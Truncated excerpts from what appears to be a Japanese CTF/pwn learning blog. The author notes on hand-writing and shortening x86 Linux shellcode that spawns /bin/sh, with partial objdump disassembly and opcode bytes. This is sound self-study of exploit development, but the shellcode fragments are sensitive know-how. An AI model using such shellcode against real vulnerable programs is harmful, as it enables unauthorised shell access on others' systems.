更にバイト数を削れたのでメモ。と思ったけど、eaxへの代入にバイト数を割いていて、今回も21bytesだった。 今回は文字列の終端に0x00が必要だったので、//shではなく/shになっている。 # objdump -d -Mintel c.out | grep -A6 \<main\> 080483ed <main>: 80483ed: 31 c9 </main></main\>…

前回よりもシェルコードを短くできたのでメモ。 前回は23bytes、今回は21bytes。 # objdump -d -Mintel b.out | grep -A8 \<main\> 080483ed <main>: 80483ed: 31 c0 xor eax,eax 80483ef: 50 push eax 80483f0: 89 e1 mov ecx,esp 80483f2: 68 2f 2f 73 68 push 0x68732f</main></main\>…

単純なオーバフローを起こすと解けるpwnは解けるようになってきた。 ただ、shellcodeが必要な問題だと、shellcodeをどこからか持ってこないといけない。 それだと応用が効かないので、shellcodeを作れるようになりたいと思う。 そのためにまずは、shellcode…